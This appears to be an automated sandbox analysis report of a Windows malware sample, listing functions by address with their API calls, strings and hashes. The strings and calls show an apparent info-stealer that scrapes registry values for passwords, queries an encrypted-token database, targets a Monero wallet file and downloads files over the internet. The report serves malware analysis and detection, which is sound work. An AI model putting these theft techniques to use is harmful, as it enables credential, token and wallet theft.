Instruction ID: 93a56a2e036bcca0ae5a00f8093626ff5d2a3de7a62097b7bd439644a13a6223
Opcode Fuzzy Hash: 98fa88fb2617673d0405095edbdfad21ff727a85a39340686e2c2409ce1613ea
Instruction Fuzzy Hash: 1B313672A01109DBCF08FBF8DC99DFE7378FB65301B184119E512E72A0DA34A946DB62

Function 008A7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008A7542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008A757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7603
RtlAllocateHeap.NTDLL(00000000), ref: 008A760A
wsprintfA.USER32 ref: 008A7640

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Strings

\, xrefs: 008A7560
C, xrefs: 008A754C
:, xrefs: 008A755C

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 38cfae40e138237a6a2827b2ce01033947958efbf17837b63ca0e159fc112824
Instruction ID: 2fc9146fccfff8c499c616420d0d2c8d9a125f38aa3df4a1e1c23df54713cdd5
Opcode Fuzzy Hash: 38cfae40e138237a6a2827b2ce01033947958efbf17837b63ca0e159fc112824
Instruction Fuzzy Hash: FB4185B1D04248EBEB10DF98DC45BEEB7B8FF19704F100199F506A7680D7786A44CBA6

Function 008960A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00894839
Part of subcall function 008947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00894849

InternetOpenA.WININET(008B0DF7,00000001,00000000,00000000,00000000), ref: 0089610F
StrCmpCA.SHLWAPI(?,0142E808), ref: 00896147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0089618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008961B3
InternetReadFile.WININET(?,?,00000400,?), ref: 008961DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0089620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00896249
InternetCloseHandle.WININET(?), ref: 00896253
InternetCloseHandle.WININET(00000000), ref: 00896260

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: ce3a5274d5c89ccc9eb3dc32ae5225d9f4d9cdc473f74a3f1a472a41e4c9b1c9
Instruction ID: 914d8f66f4741ba607c6b14169307ce42ede1e563aa6811648971946abf9b88a
Opcode Fuzzy Hash: ce3a5274d5c89ccc9eb3dc32ae5225d9f4d9cdc473f74a3f1a472a41e4c9b1c9
Instruction Fuzzy Hash: 9A517571900218ABDF24EF90DC45BEE77B8FB44705F148099B606E71C0EB746A85CF56

Function 008972D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0089733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008973B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0089740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00897452
HeapFree.KERNEL32(00000000), ref: 00897459
task.LIBCPMTD ref: 00897555

Strings

Password, xrefs: 00897401

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 00165b238907f91f21834d5232bb24e4f44447593fe1c2b52b215e07590af594
Instruction ID: 52cda375ef054e8d21d3be0b2ec5e535f278973f3d4714c07c37b9ef8c0c9fa5
Opcode Fuzzy Hash: 00165b238907f91f21834d5232bb24e4f44447593fe1c2b52b215e07590af594
Instruction Fuzzy Hash: 2B611CB59141689BDF24EB54CC45BDAB7B8FF44300F0481E9E689E6141DB705BC9CF91

Function 0089BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

lstrlen.KERNEL32(00000000), ref: 0089BC9F

Part of subcall function 008A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008A8E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0089BCCD
lstrlen.KERNEL32(00000000), ref: 0089BDA5
lstrlen.KERNEL32(00000000), ref: 0089BDB9

Strings

AccountTokens, xrefs: 0089BABA
SELECT service, encrypted_token FROM token_service, xrefs: 0089BBEB
AccountTokens, xrefs: 0089BB49
AccountId, xrefs: 0089BCC4

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: c977948d41331916f227051f0a3bb6406ac5d67d2e8c4dda0e9905fdf6810f2d
Instruction ID: d778f6c940332448280b1dec80b70b933fd537648cffb630e08c9dae742750c2
Opcode Fuzzy Hash: c977948d41331916f227051f0a3bb6406ac5d67d2e8c4dda0e9905fdf6810f2d
Instruction Fuzzy Hash: D7B13A719101089AEF48EBA8DD96AEE7378FF15300F444129F507E6991EF386A49CB63

Function 00894FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00894FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00894FD1
InternetOpenA.WININET(008B0DDF,00000000,00000000,00000000,00000000), ref: 00894FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00895011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00895041
InternetCloseHandle.WININET(?), ref: 008950B9
InternetCloseHandle.WININET(?), ref: 008950C6

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: e4dab9902ae9bb0fc76be9aeb54c57364c905d96973c95b6961d623dfb1f0092
Instruction ID: c28bcb65f49ae423508b3a46e3742b12af1f71e6da32f2af217da2458819efa8
Opcode Fuzzy Hash: e4dab9902ae9bb0fc76be9aeb54c57364c905d96973c95b6961d623dfb1f0092
Instruction Fuzzy Hash: F031F8B4A4121CABDB20DF94DC85BDDB7B4FB48704F1081D9FA09A7281C7746AC68F99

Function 008A8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0142DF18,00000000,?,008B0E2C,00000000,?,00000000), ref: 008A8130
RtlAllocateHeap.NTDLL(00000000), ref: 008A8137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 008A8158
wsprintfA.USER32 ref: 008A81AC

Strings

%d MB, xrefs: 008A81A3
@, xrefs: 008A814D

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2922868504-3474575989
Opcode ID: e126cf118e8e4668560cf7304922e55e924039b28987f6a35656c02aad8c2aaa
Instruction ID: cfba3f8b178286f65f50f9ec489d7156056f36a1aae02e0176af8b63ab1daf18
Opcode Fuzzy Hash: e126cf118e8e4668560cf7304922e55e924039b28987f6a35656c02aad8c2aaa
Instruction Fuzzy Hash: 6521F9B1E44218ABEB00DFD4CC49FAEB7B8FB45B14F104509F616EB680D77869018BA5

Function 008A83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008A8426
wsprintfA.USER32 ref: 008A8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 008A847B
RegCloseKey.ADVAPI32(00000000), ref: 008A848C
RegCloseKey.ADVAPI32(00000000), ref: 008A8499

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

RegQueryValueExA.KERNEL32(00000000,0142DF78,00000000,000F003F,?,00000400), ref: 008A84EC
lstrlen.KERNEL32(?), ref: 008A8501
RegQueryValueExA.KERNEL32(00000000,0142E0F8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,008B0B34), ref: 008A8599
RegCloseKey.KERNEL32(00000000), ref: 008A8608
RegCloseKey.ADVAPI32(00000000), ref: 008A861A

Strings

%s\%s, xrefs: 008A844D

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
